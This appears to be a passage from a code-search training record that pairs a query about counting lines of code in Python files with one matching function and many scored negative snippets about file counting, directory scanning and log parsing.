ttl_files_in_dir(dir_path, pat='.'):\n if not path.isdir(dir_path):\n raise NotADirectoryError\n\n # In a subprocess, count list the files in the dir and count them, convert output to an int\n ttl = int(check_output('ls -A -U --color=never {} | grep {} | wc -l'.format(dir_path, pat), shell=True).strip())\n\n return ttl", "def count(train_dir):\r\n path = train_dir\r\n count = 0\r\n for fn in os.listdir(path): #fn 表示的是文件名\r\n count = count + 1\r\n return count", "def _gather_path(self, comp, path, function_map):\n print(f'\"Analyzing {comp} at {path}')\n if not os.path.exists(path):\n print('No files in {path}')\n return\n\n for root, _dirs, files in os.walk(path):\n if self.excluded(root):\n continue\n if not self.included(root, self.dir_inclusions):\n continue\n for fname in files:\n if not self.included(fname, self.file_inclusions):\n continue\n if fname.endswith(\".su\"):\n with open(os.path.join(root, fname), \"r\") as frame:\n for line in frame.readlines():\n split = line.split()\n if len(split) < 3:\n continue\n func = f\"{comp}:{split[0]}\"\n usage = int(split[-2])\n if usage < self.cutoff:\n continue\n if func not in function_map:\n function_map[func] = usage\n elif usage > function_map[func]:\n function_map[func] = usage" ]
[ "0.63941246", "0.6148792", "0.5896523", "0.5792946", "0.56846035", "0.5674842", "0.56738776", "0.56557024", "0.5595728", "0.55465335", "0.55265635", "0.5509024", "0.5490125", "0.54562646", "0.53724253", "0.53600603", "0.53305817", "0.5296591", "0.52905095", "0.52354455", "0.52294916", "0.52220196", "0.5198103", "0.5195978", "0.5186539", "0.51656497", "0.5163649", "0.51358575", "0.5120946", "0.51164967", "0.51098484", "0.51092833", "0.50853574", "0.5083181", "0.5081521", "0.5078778", "0.5077839", "0.50759494", "0.50725037", "0.5071149", "0.50593597", "0.50585854", "0.5058144", "0.50517154", "0.5050045", "0.504794", "0.50477606", "0.5043572", "0.50417614", "0.5040509", "0.503812", "0.50328654", "0.5029637", "0.50265723", "0.5007045", "0.50036335", "0.5002633", "0.49971974", "0.49948022", "0.4990057", "0.4989779", "0.49896127", "0.49869934", "0.49868932", "0.4984892", "0.49808612", "0.49776876", "0.4973755", "0.49726373", "0.49718317", "0.4969438", "0.49547297", "0.49531397", "0.494195", "0.49412704", "0.4932267", "0.49320176", "0.49248803", "0.4924772", "0.49236137", "0.49229372", "0.492181", "0.49179047", "0.49156964", "0.49108875", "0.4906544", "0.49041307", "0.49031678", "0.48896712", "0.48881805", "0.4885496", "0.48829335", "0.48813263", "0.48789862", "0.48754758", "0.4871829", "0.4867939", "0.48621118", "0.48555622", "0.4850242" ]
0.6992177
0
Returns the total, nonblank and net loc for all the python files in a directory
def get_num_unique_programs_and_users(path, scenarios): unique_programs = set() valid_u_ids = set() for scenario in scenarios: valid_u_ids.add(scenario[0]["UniqueId"]) for filename in glob.iglob(path + 'PythonTutor_Input_Data_Sessions_20*/**/*.py', recursive=True): print(filename) x = filename[filename.rfind('/') + 1:filename.rfind('_')] if x not in valid_u_ids: continue with open(filename, 'r') as thisfile: blob = thisfile.read() unique_programs.add(blob) valid_ips = set() not_valid_ips = set() count = 0 for filename in glob.iglob(path + 'PythonTutor_Input_Data_Sessions_20*/**/*.json', recursive=True): x = filename[filename.rfind('/') + 1:filename.rfind('_a')] if x not in valid_u_ids: continue with open(filename, 'r') as thisfile: blob = json.load(thisfile) if blob["ip"] in not_valid_ips: pass elif blob["ip"] in valid_ips: valid_ips.remove(blob["ip"]) count += 1 not_valid_ips.add(blob["ip"]) else: valid_ips.add(blob["ip"]) print(count) print(len(valid_ips)) return unique_programs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_folder_total(path):\n files = os.listdir(path)\n pythonfiles = ['%s/%s' % (path, filename) for filename in files if filename[-3:] == '.py']\n total = { 'net': 0, 'total': 0, 'nonblank': 0, 'num_inputs':0 }\n for filename in pythonfiles:\n with open(filename, 'r') as thisfile:\n blob = thisfile.read()\n # print filename\n thisloc = loc(blob)\n for k, v in thisloc.items():\n total[k] += v\n return total", "def loc():\n file_types = (\n ['Python', 'py', '#']\n )\n\n click.echo('Lines of code\\n-------------')\n\n click.echo(\"{0}: {1}\".format(file_types[0], count_locs(file_types[1],\n file_types[2])))\n\n return None", "def analyze_files(self):\n for file in os.listdir(self.directory):\n if file[-3:] == (\".py\"):\n fopen = open(os.path.join(self.directory, file), \"r\")\n try:\n if not (py_file := fopen):\n raise FileNotFoundError\n\n with py_file: # close file after opening\n class_count: int = 0\n fun_count: int = 0\n l_count: int = 0\n ch_count: int = 0\n for line in py_file: # calculate values for the file\n if line.strip().startswith(\"class \"):\n class_count = class_count+1\n elif line.strip().startswith(\"def \"):\n fun_count = fun_count+1\n\n l_count = l_count+1\n ch_count = ch_count+len(line)\n\n self.files_summary[str(os.path.join(self.directory, file))] = {\"class\": class_count, \"function\": fun_count, \"line\": l_count,\n \"char\": ch_count}\n except FileNotFoundError:\n print(f\"File {py_file} is not found or can not be opened\")\n fopen.close()", "def checkSum():\n val = 0\n for ext in EXTENSION_GLOBS:\n for f in glob.glob (ext):\n stats = os.stat(f)\n val += stats[stat.ST_SIZE] + stats[stat.ST_MTIME]\n return val", "def fileCounter(directory):", "def getFileLoc(self):\n\t\trval = []\n\t\tlocalVolTbl = self.file_loc['localVolTbl']\n\t\tnetVolTbl = self.file_loc['netVolTbl']\n\t\t\n\t\tif localVolTbl != None:\n\t\t\trval.extend((FILE_LOC[0],\n\t\t\t\tFILE_LOC[1] + self.file_loc['basePathname'] + \\\n\t\t\t\t\"\\\\\" + self.file_loc['remainPathname']))\n\t\n\t\t\tfor ii in range(len(VOL_TYPE)):\n\t\t\t\tif (self.header['file_attributes'] & (2 ** (ii + 1))) > 0:\n\t\t\t\t\trval.append(VOL_TYPE[ii])\n\t\t\t\t\n\t\t\trval.extend((FILE_LOC[2] + localVolTbl['volume_label'],\n\t\t\t\tFILE_LOC[3] + str(localVolTbl['vol_serial_num'])))\t\t\n\t\n\t\tif netVolTbl != None:\n\t\t\trval.append(FILE_LOC[4] + netVolTbl['net_sharename'] + \\\n\t\t\t\t\"\\\\\" + self.file_loc['remainPathname'])\n\t\treturn rval", "def check_dir(self):\n if not Path(self.src_dir).exists():\n print('No such directory found:', self.src_dir)\n return\n\n nc_all = self.src_dir + \"/*.nc*\"\n if len(glob.glob(nc_all)) == 0:\n print('No NetCDF files found in:', self.src_dir)\n return\n\n return nc_all", "def analyze_files(self):\n num_file = 0\n results = dict()\n try:\n list_files = os.listdir(self.directory)\n except FileNotFoundError:\n raise FileNotFoundError(\"Can't find any file\")\n else:\n for file in list_files: #looping the files in the directly\n num_file += 1\n if file.endswith(\".py\"): # Looking for files that end with .py\n try:\n fp = open(os.path.join(self.directory, file), \"r\")\n except FileNotFoundError:\n raise FileNotFoundError(f\"Can't open file no {num_file}\")\n else:\n with fp:\n c_total = 0 #Total length of Characters for the entire file\n filename = file # Storing the file name\n t_line = 0 # Getting the total number of line\n t_def = 0 #Getting the total number of functions\n t_class = 0 #Getting the total number of classes\n \n for line in fp:\n t_line += 1 # Counting each 
line\n t_char = len(line) #Length of characters for each line\n n_line = line.strip() # gets rid of white spaces and new lines\n c_total += t_char # adding each total char in line to the pervious total char in line\n if n_line.startswith(\"def \"): \n t_def += 1 \n elif n_line.startswith(\"class \"):\n t_class += 1\n results[filename] = {'class': t_class, 'function': t_def, 'line': t_line, 'char': c_total }\n return results", "def test_case_6():\n print(\"*********Test_case_6***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir', 't1.c')\n result = find_files('.c', path)\n print(result)", "def test_case_5():\n print(\"*********Test_case_5***********\")\n result = find_files('.c', \"\")\n print(result)", "def execute(root_dir):\n \n \n #Getting all the file recursively that py files\n lenght=[]\n libraries=[]\n nesting_factors=[]\n param_count=[]\n total_var=[]\n duplicate_for_the_repo=[]\n average_nesting_factor=0\n average_param=0\n code_duplication=0\n avg_var=0\n \n k=root_dir.rsplit('-')\n n=k[0]\n m=k[-1]\n \n urls=[ repo for repo in repo_list if n and m in repo ]\n if urls:\n url=urls[0]\n else:\n url=root_dir\n\n for filename in glob.iglob(root_dir + '/**/*.py', recursive=True):\n #filename=filename.replace(\" \", \"\\\\ \")\n filename=str_to_raw(filename)\n try: \n count=pygount.source_analysis(filename, 'pygount') # counting the line of codes for the py files\n l=count.code\n lenght.append(l)\n library =imported_module(filename)\n for lib in library:\n libraries.append(lib)\n deg_list=nesting_factor(for_loop_position(filename)) \n for deg in deg_list:\n nesting_factors.append(deg)\n\n\n\n for param in parameter_count(filename):\n param_count.append(param)\n for var in variable_count(filename):\n total_var.append(var)\n duplicate_for_the_repo.append(duplicated_line(filename))\n except Exception as e:\n print(\"type error: \" + str(e))\n print(filename)\n \n \n if len(nesting_factors) !=0: \n average_nesting_factor= np.mean(nesting_factors)\n if param_count: \n average_param= np.mean(param_count) \n libraries=unique(libraries)\n repo_count=sum(lenght)\n if total_var:\n avg_var=np.mean(total_var)\n if repo_count and duplicate_for_the_repo:\n code_duplication=(sum(duplicate_for_the_repo)/repo_count)*100\n \n return {'repository_url': url, \n 'number of lines': repo_count, \n 'libraries': libraries,\n 'nesting factor': average_nesting_factor,\n 'code duplication': code_duplication,\n 'average parameters':average_param,\n 'average variables':avg_var}", "def _get_run_info(self, path, creation_date):\n total = 0\n try:\n for entry in os.scandir(path):\n # Only evaluates size of files and not folders inside raw/proc\n if entry.is_file():\n # if it's a file, use stat() function\n total += entry.stat().st_size\n\n except NotADirectoryError:\n # if `path` isn't a directory, get the file size then\n total = os.path.getsize(path)\n except PermissionError:\n # if for whatever reason we can't open the folder, return 0\n return 0\n\n if os.path.isdir(path):\n validator = RunValidator(path)\n elif path.endswith(\".h5\"):\n validator = FileValidator(H5File(path).files[0])\n else:\n return 0\n\n try:\n validator.run_checks()\n except Exception:\n pass\n return total, str(ValidationError(validator.problems))", "def test_case_3():\n print(\"*********Test_case_3***********\")\n result = find_files('.c', None)\n print(result)", "def count_LOC(path):\n re_empty = re.compile(r\"[\\s]*(#|\\n|\\\"\\\"\\\")\")\n re_for = re.compile(r\"for.*in\")\n re_lambda = re.compile(r\"lambda\")\n re_if 
= re.compile(r\"if.*:\")\n re_def = re.compile(r\"def (?P<fname>\\w+)\\(\")\n\n total_LOC, indent_level = 0, 0\n cur_part = None\n parts = defaultdict(int)\n\n with open(path, 'r') as _file:\n for line in filter(lambda l : not re_empty.match(l), _file):\n\n extra = len( re_for.findall(line) ) - 1 + len( re_lambda.findall(line) ) - 1 + len( re_if.findall(line) ) -1\n\n if extra < 0: extra = 0\n\n total_LOC += 1 + extra\n if cur_part:\n parts[cur_part] += 1 + extra\n\n defs = re_def.search(line)\n if defs:\n cur_part = defs.groupdict()['fname']\n indent_level = first_non_whitespace(line)\n\n cur_indent = first_non_whitespace(line)\n if cur_indent < indent_level:\n cur_part = None\n indent_level = cur_indent\n\n return(total_LOC, parts)", "def getBaseSrcFile(self) -> List[int]:\n ...", "def checkSumHelper(arg, dirname, fnames):\n val = 0\n files = [name for name in fnames if os.path.splitext(name)[1] in EXTENSIONS]\n for file in files:\n absFile = os.path.join(dirname,file)\n try:\n stats = os.stat(absFile)\n except OSError,e:\n # This is to skip over temporary files or files\n # nosy doesn't have permission to access\n # print \"Nosy: skipping file %s with error %s\"%(absFile,e)\n continue\n val += stats[stat.ST_SIZE] + stats[stat.ST_MTIME]\n arg.append(val)\n return", "def test_case_1():\n print(\"*********Test_case_1***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir')\n result = find_files('.c', path)\n for file in result:\n print(file)", "def test_case_4():\n print(\"*********Test_case_4***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir')\n result = find_files('', path)\n for file in result:\n print(file)", "def print_local_output_files_stats():\n print \"\\n\\nFILES CREATED:\"\n for filename in os.listdir('../output'):\n filesize = os.path.getsize('../output/' + filename)\n print str(filesize) + \"\\t\" + filename\n print \"\\n\"", "def get_amount_of_data(directory: str):\n size = sum([os.path.getsize(os.path.join(directory, item)) for item in os.listdir(directory) if os.path.isfile(os.path.join(directory, item))])\n print(size)\n return size", "def readfiles(self, dirname , search , notsearch = 'rgvar' , notdir = 'xyvwa'):\n print('We are in the following directory: %s looking for files that contain %s and not %s' %(dirname, search , notsearch))\n dirlist = os.listdir(dirname)\n for filep in dirlist:\n filep = os.path.join(dirname,filep) \n if os.path.islink(filep):\n pass\n elif os.path.isdir(filep):\n m = re.search(notdir , filep)\n if m is None:\n self.readfiles(filep , search, notsearch = notsearch, notdir = notdir )\n elif os.path.isfile(filep) and '.dat' in filep: \n nm = re.search(notsearch, filep)\n m = re.search(search , filep)\n #print m , nm\n if m is not None and nm is None:\n self.plotfiles.append(filep)\n else:\n pass", "def my_root_listdir(root_dir):\n root_listdir = [\n images_dir\n for images_dir in os.listdir(root_dir)\n if not any(\n characters in images_dir for characters in [\".\", \"test\", \"train\", \"valid\"]\n )\n ]\n summ = 0\n for images_dir in root_listdir:\n summ += len(os.listdir(root_dir + \"/\" + images_dir)) / 2 - 2\n print(\"Sum of images in directories: \", int(summ))\n return root_listdir", "def retrive_scanning_scheme(self, Nest_data_directory, file_keyword = 'PMT_0Zmax'):\r\n fileNameList = []\r\n# ImgSequenceNum = 0\r\n for file in os.listdir(Nest_data_directory):\r\n if file_keyword in file:\r\n fileNameList.append(file)\r\n \r\n RoundNumberList = []\r\n CoordinatesList = []\r\n for eachfilename in 
fileNameList:\r\n # Get how many rounds are there\r\n try:\r\n RoundNumberList.append(eachfilename[eachfilename.index('Round'):eachfilename.index('_Grid')])\r\n except:\r\n RoundNumberList.append(eachfilename[eachfilename.index('Round'):eachfilename.index('_Coord')])\r\n \r\n RoundNumberList = list(dict.fromkeys(RoundNumberList)) # Remove Duplicates\r\n \r\n CoordinatesList.append(eachfilename[eachfilename.index('Coord'):eachfilename.index('_PMT')])\r\n CoordinatesList = list(dict.fromkeys(CoordinatesList))\r\n \r\n# print(RoundNumberList, CoordinatesList, fileNameList)\r\n return RoundNumberList, CoordinatesList, fileNameList", "def add_loc(self):\n self.loc = 0\n for t in self.thys:\n with open(t, 'r') as f:\n for l in f:\n if l.strip():\n self.loc += 1", "def process_files(file_location, day):\n # construct file path\n file_dir = PREFIX+file_location\n file_pattern = file_dir+'lz_'+day+'*_raw.root'\n # print(file_pattern)\n file_list = glob.glob(file_pattern)\n print(\"There are %s MC files in the requested directory (%s).\" %(len(file_list), file_dir))\n file_names = []\n for f in file_list:\n file_name_only = f.split('/')\n file_names.append(file_name_only[-1])\n return file_names", "def scan(self,project_dir):\n ftypes = [\".csv\", \".data\", \".xlsx\"]\n print(\"Scanning directory : \",project_dir)\n print(\"Searching for : \",ftypes)\n self.localfiles = {}\n for dirpath, dirnames, filenames in os.walk(project_dir, topdown=True):\n for filename in filenames:\n for ftype in ftypes:\n if ftype in filename:\n self.localfiles[filename] = {\n \"filename\": filename,\n \"filesize\": getsize(os.path.join(dirpath, filename)),\n \"abspath\": os.path.join(dirpath, filename),\n \"dirpath\": dirpath,\n \n }\n print(\"Found These: \",[file_name for file_name in self.localfiles.keys()])", "def getFilePaths():\n \n image_dir = r'/hpc/wfok007/mpi_heart/Training Set'\n mask_paths = []\n image_paths = []\n for root, dirs, files in os.walk(image_dir, topdown=False):\n for name in files:\n if name == 'laendo.nrrd':\n mask_paths.append(os.path.join(root, name))\n elif name == 'lgemri.nrrd':\n image_paths.append(os.path.join(root, name))\n else:\n print ('%s is unknown' %name)\n return mask_paths, image_paths", "def total_files(self):\n command = \"SELECT searched FROM options;\"\n return self.c.execute(command)", "def get_checkpoint():\n\timport numpy as np\n\n\tcheckpoint = []\n\tfor directory in directories:\n\t\ttry: # try to find folder\n\t\t\tos.chdir('./'+directory)\n\t\texcept:\n\t\t\tcontinue\n\t\tcontents = os.listdir('./')\n\t\tif contents == []: # if folder is empty\n\t\t\tprint(\"No data for\", directory)\n\t\t\tos.chdir('..')\n\t\t\tcontinue\n\t\tcounter = []\n\t\tfor entry in contents:\n\t\t\tentry = entry.split('.')\n\t\t\tnum = entry[0][2:]\n\t\t\ttry: # excludes files that aren't of type x-y.jpg\n\t\t\t\tnum = int(num)\n\t\t\t\tcounter.append(num)\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\tcheckpoint.append(max(counter))\n\t\tos.chdir('..')\n\tcheckpoint = np.mean(checkpoint)\n\treturn checkpoint", "def target_totalfiles(self):\n return self._cfg.get('totalfiles', None)", "def test_case_2():\n print(\"*********Test_case_2***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir')\n result = find_files(None, path)\n print(result)", "def fs_files_total(self):\n return self._fs_files_total", "def scanFiles(directory, includes = [\"*\"], excludes = []):\n\treturn scanAll(directory, includes, excludes)[1]", "def test_search_file(self):\n base_dir = join(get_current_path(), 
'samples', 'base_dir1')\n output_dir = join(get_current_path(), 'samples', 'base_dir1', 'result')\n files = search_files(base_dir, output_dir)\n self.assertTrue(self.verify_sub_folders(list(files.keys())))\n\n # sub folders under Concord is not counted, only files\n self.assertEqual(len(files['Concord']), 5)\n self.assertEqual(len(files['ListCo Equity']), 1)\n self.assertEqual(len(files['CLO Equity']), 2)\n self.assertEqual(files['ListCo Equity'][0], join(base_dir, 'ListCo Equity', 'Positions1219.xlsx'))", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def get_all_metrics(dir):\r\n file_lst = os.listdir(dir)\r\n file_lst = list(filter(lambda x: re.findall(r'\\.csv$',x), file_lst))\r\n return file_lst", "def current_missing(**kwargs) -> int:\n data_path = os.environ.get(BBG_ROOT, '').replace('\\\\', '/')\n if not data_path: return 0\n return len(files.all_files(f'{data_path}/Logs/{missing_info(**kwargs)}'))", "def getNtot(self,dir):\n return int(readfile(dir + '/struct_enum.out')[-1].split()[0])", "def test_known_file_locations(dataset: linux.LinuxSourcesDataset):\n assert (dataset.src_tree_root / \"kernel\" / \"kexec.c\").is_file()\n assert (dataset.src_tree_root / \"kernel\" / \"smpboot.h\").is_file()", "def usagestats_parse(dirpath):\r\n # Create database\r\n # TODO: change to an easier format, probably json.\r\n db, cursor = create_table()\r\n\r\n # Some vars for logging\r\n processed = 0\r\n err = 0\r\n\r\n # Iterate through the /usagestats/ directory and fetch all files\r\n for root, dirnames, filenames in os.walk(dirpath, topdown=True, onerror=None, followlinks=False):\r\n if 'daily' in root or 'weekly' in root or 'monthly' in root or 'yearly' in root:\r\n # Retrieve the folder name to save what the frequency of the usagestats were:\r\n frequency = root.split('/')[-1]\r\n for filename in filenames:\r\n # Check if filename is only numbers (which is an epoch time representation)\r\n if filename.isnumeric():\r\n try:\r\n tree = ET.parse(os.path.join(root, filename))\r\n except ET.ParseError:\r\n parse_file_with_protobuf(os.path.join(root, filename), db)\r\n continue\r\n\r\n # We have sucessfully parsed the usagestats xml.\r\n # So continue processing\r\n tree_root = tree.getroot()\r\n\r\n for elem in tree_root:\r\n parse_sub_elements(frequency, elem, filename, db)\r\n\r\n # query for reporting\r\n cursor.execute('''\r\n select \r\n usage_type,\r\n datetime(lastime/1000, 'UNIXEPOCH', 'localtime') as lasttimeactive,\r\n timeactive as time_Active_in_msecs,\r\n timeactive/1000 as timeactive_in_secs,\r\n case last_time_service_used WHEN '' THEN ''\r\n ELSE datetime(last_time_service_used/1000, 'UNIXEPOCH', 'localtime')\r\n end last_time_service_used,\r\n case last_time_visible WHEN '' THEN ''\r\n ELSE datetime(last_time_visible/1000, 
'UNIXEPOCH', 'localtime') \r\n end last_time_visible,\r\n total_time_visible,\r\n app_launch_count,\r\n package,\r\n CASE types\r\n WHEN '1' THEN 'MOVE_TO_FOREGROUND'\r\n WHEN '2' THEN 'MOVE_TO_BACKGROUND'\r\n WHEN '5' THEN 'CONFIGURATION_CHANGE'\r\n WHEN '7' THEN 'USER_INTERACTION'\r\n WHEN '8' THEN 'SHORTCUT_INVOCATION'\r\n ELSE types\r\n END types,\r\n classs,\r\n source,\r\n fullatt\r\n from data\r\n order by lasttimeactive DESC\r\n ''')\r\n all_rows = cursor.fetchall()\r\n\r\n # HTML report section\r\n h = open('./Report.html', 'w')\r\n h.write('<html><body>')\r\n h.write('<h2>Android Usagestats report (Dates are localtime!)</h2>')\r\n h.write('<style> table, th, td {border: 1px solid black; border-collapse: collapse;}</style>')\r\n h.write('<br />')\r\n\r\n # HTML headers\r\n h.write('<table>')\r\n h.write('<tr>')\r\n h.write('<th>Usage Type</th>')\r\n h.write('<th>Last Time Active</th>')\r\n h.write('<th>Time Active in Msecs</th>')\r\n h.write('<th>Time Active in Secs</th>')\r\n h.write('<th>Last Time Service Used</th>')\r\n h.write('<th>Last Time Visible</th>')\r\n h.write('<th>Total Time Visible</th>')\r\n h.write('<th>App Launch Count</th>')\r\n h.write('<th>Package</th>')\r\n h.write('<th>Types</th>')\r\n h.write('<th>Class</th>')\r\n h.write('<th>Source</th>')\r\n h.write('</tr>')\r\n\r\n for row in all_rows:\r\n usage_type = row[0]\r\n lasttimeactive = row[1]\r\n time_Active_in_msecs = row[2]\r\n timeactive_in_secs = row[3]\r\n last_time_service_used = row[4]\r\n last_time_visible = row[5]\r\n total_time_visible = row[6]\r\n app_launch_count = row[7]\r\n package = row[8]\r\n types = row[9]\r\n classs = row[10]\r\n source = row[11]\r\n\r\n processed = processed + 1\r\n # report data\r\n h.write('<tr>')\r\n h.write('<td>' + str(usage_type) + '</td>')\r\n h.write('<td>' + str(lasttimeactive) + '</td>')\r\n h.write('<td>' + str(time_Active_in_msecs) + '</td>')\r\n h.write('<td>' + str(timeactive_in_secs) + '</td>')\r\n h.write('<td>' + str(last_time_service_used) + '</td>')\r\n h.write('<td>' + str(last_time_visible) + '</td>')\r\n h.write('<td>' + str(total_time_visible) + '</td>')\r\n h.write('<td>' + str(app_launch_count) + '</td>')\r\n h.write('<td>' + str(package) + '</td>')\r\n h.write('<td>' + str(types) + '</td>')\r\n h.write('<td>' + str(classs) + '</td>')\r\n h.write('<td>' + str(source) + '</td>')\r\n h.write('</tr>')\r\n\r\n # HTML footer\r\n h.write('<table>')\r\n h.write('<br />')\r\n\r\n print('')\r\n print('Records processed: ' + str(processed))\r\n print('Triage report completed. See Reports.html.')", "def avail(self):\n\n return os.listdir(self.datadir)", "def checkSumWalk(top=\".\", func=checkSumHelper):\n values = []\n os.path.walk( top, checkSumHelper, values )\n return sum(values)", "def MainStats(path, filetype, NrExp, col, start, stop):\n# path= path.split('/') # here is better to google and see what is going on. 
Or experiment alone\n# path= \"/\".join(path[:-1]) \n dato=ExtractData_raw_files(path, filetype)\n dBase=dato.createDictBase()\n stats = Stats(dBase, NrExp, col, start, stop)\n means, stds=stats.Means_Stds()\n times = stats.time_return()\n return means , stds, times", "def _get_filepaths(self):\n self._printer(str(self.__len__()) + \" file paths have been parsed in \" + str(self.timer.end))\n if self._hash_files:\n return pool_hash(self.filepaths)\n else:\n return self.filepaths", "def totalFiles(pathCopyData, pathNetCDF, dateInit, dateFinal):\n dateInit = datetime.strptime(dateInit, '%Y-%m-%d')\n dateFinal = datetime.strptime(dateFinal, '%Y-%m-%d')\n dirr = pathCopyData\n dirr2 = pathNetCDF\n #name = 'wrfout_c1h_d01_\\d\\d\\d\\d-\\d\\d-\\d\\d_00:00:00.\\d\\d\\d\\d.nc'\n name = 'wrfout_c1h_d01_\\d\\d\\d\\d-\\d\\d-\\d\\d_00:00:00.a\\d\\d\\d\\d'\n date = '\\d\\d\\d\\d-\\d\\d-\\d\\d'\n fil = []\n ba = []\n patron2 = re.compile(date)\n patron = re.compile(name + '.*')\n for base, dirs, files in os.walk(dirr2, topdown=True):\n for value in files:\n if patron.match(value) != None:\n f = patron2.findall(value)\n dateNetCDF = datetime.strptime(f[0], '%Y-%m-%d')\n if (dateNetCDF < dateFinal) & (dateNetCDF > dateInit):\n fil.append(value)\n ba.append(base)\n fdata = df.DataFrame(fil, columns=['nameFile'])\n fbase = df.DataFrame(ba, columns=['nameBase'])\n fdata.to_csv(dirr + 'tfile.txt', encoding='utf-8', index=False)\n fbase.to_csv(dirr + 'tbase.txt', encoding='utf-8', index=False)", "def totalfiles(self):\n return len([sz for sz in self.iterate()])", "def lsinfo(path):", "def enumerate():\n names = [f for f in os.listdir(_INPUT_ROOT) if not\n os.path.isdir(os.path.join(_INPUT_ROOT, f))]\n return sorted(names)", "def test_scan_dir_files(self):\n self.run_scan(self.subdir, self.nest_fcount + 1)", "def _find_files(directory, dirs_to_look_in, files_to_search_for, \n current_dir, see_files):\n full_name = True\n if see_files:\n full_name = False\n files_to_load = search_directory(directory, \n look_in=dirs_to_look_in,\n search_for=files_to_search_for,\n file_type='files',\n current_dir=current_dir,\n full_name=full_name)\n if not files_to_load:\n raise UserWarning('No files were found matching the search for %s'\\\n ' in the directory(s) %s%s' \\\n % (files_to_search_for, directory, \n dirs_to_look_in))\n return files_to_load", "def findFiles(self):\n\n with open('analysis_result/firmwalkerOutput.txt', 'r') as firmwalker:\n for line in firmwalker:\n if line.startswith('##################################### ssh'):\n self.ssh = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### dropbear'):\n self.dropbear = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### busybox'):\n self.busyBox = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### telnet'):\n self.telnet = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### openssl'):\n self.openssl = next(firmwalker).strip('d/').strip('\\n')", "def missing_in_gn_by_file(self):\n return self._missing_gn_files", "def find_all_infilepaths(in_dir):\n workdir = os.getcwd()\n os.chdir(in_dir)\n\n infiles_paths = dict()\n for infilename in glob.glob(\"[0-9]*_[0-9]*_[0-9]*.hdf5\"):\n pos = infilename.split('_')\n pos[-1] = pos[-1].split('.')[0]\n pos = tuple(list(map(lambda s: int(s), pos)))\n num_pos = _3d_to_numeric\n infiles_paths[num_pos] = os.path.join(in_dir, 
infilename)\n\n os.chdir(workdir)\n return infiles_paths", "def dataStats(reportsDir = \"./reports/\"):\n legMulti = glob.glob(reportsDir+\"/leg/*.json\")\n legOne = glob.glob(reportsDir+\"/leg/oneproc/*.json\")\n legBroken = glob.glob(reportsDir+\"/leg/broken/*.json\")\n \n malMulti = glob.glob(reportsDir+\"/mal/*.json\")\n malOne = glob.glob(reportsDir+\"/mal/oneproc/*.json\")\n malBroken = glob.glob(reportsDir+\"/mal/broken/*.json\")\n \n print(\"\"\"Legal files:\n Total: {0}, One-proc: {1}, Multi-proc: {2}, Broken: {3} \"\"\"\n .format(len(legBroken+legMulti+legOne), len(legOne), len(legMulti), len(legBroken)))\n print(\"\"\"Malicious files:\n Total: {0}, One-proc: {1}, Multi-proc: {2}, Broken: {3} \"\"\"\n .format(len(malBroken+malMulti+malOne), len(malOne), len(malMulti), len(malBroken)))\n print(\"Working samples: {0}\".format(len(malMulti+malOne+legMulti+legOne)))", "def dirsize(self):\n total = 0\n for p in self.select_file(recursive=True):\n try:\n total += p.size\n except: # pragma: no cover\n print(\"Unable to get file size of: %s\" % p)\n return total", "def list_sources(config, base_dir, verbose=False):\n for source in config.sources_under(abspath(base_dir)):\n if verbose:\n print(\"# %s (%s)\" % (source.nicedir, ' '.join(source.info)))\n else:\n print(source.nicedir)", "def count_total_line():\n count = 0\n file_count = 0\n for filename in os.listdir('.'):\n if filename.endswith(\".json\"):\n file_count += 1\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n count += 1\n print(\"There are {0} lines in {1} json files\".format(count, file_count))", "def _local_dir(self):\n return []", "def check_init_files_and_folders():\n\t#['cascade_wimb_bus_front_100_stages_1000_pos_3000_neg.xml', 'cascade_wimb_bus_front_33_stages_1000_pos_3000_neg_wrong.xml', 'color_detect_2.py', 'dedupe.py', 'detect_image_group_ku.py', 'detect_shape_5.py', 'get_cam_id_2.py', 'get_image_8.py', 'gui_hsv.py', 'knaps.py', 'knapsack_2.py', 'maps.html', 'program_detect_rectangle.zip', 'start_capture.py']\n\tfile_list=[\n\t#'cascade_wimb_bus_front_100_stages_1000_pos_3000_neg.xml', \n\t'models/cascade_wimb_bus_front_33_stages_1000_pos_3000_neg_wrong.xml', \n\t#'color_detect_2.py', \n\t#'dedupe.py', \n\t'detect_bus_haar_group.py', \n\t#'detect_shape_5.py', \n\t'get_cam_detail.py', \n\t'get_image.py', \n\t#'gui_hsv.py', \n\t#'knaps.py', \n\t#'knapsack_2.py', \n\t#'maps.html', \n\t#'program_detect_rectangle.zip', \n\t'start_wimb.py',\n\t'g.php',\n\t]\n\tdirectory_list=[\n\t'images',\n\t'images_bgs',\n\t'images_bgs_mask',\n\t#'images_bgs_result',\n\t'images_color',\n\t'images_haar',\n\t'images_haar_result',\n\t'images_number',\n\t'images_number_result',\n\t'models',\n\t'images_old',\n\t'text_number',\n\t]\n\t\n\tfor file_name in file_list: print 'file '+file_name+' existed: '+str(os.path.isfile(file_name))\n\tfor directory_name in directory_list: \n\t\tprint 'directory '+directory_name+' existed: 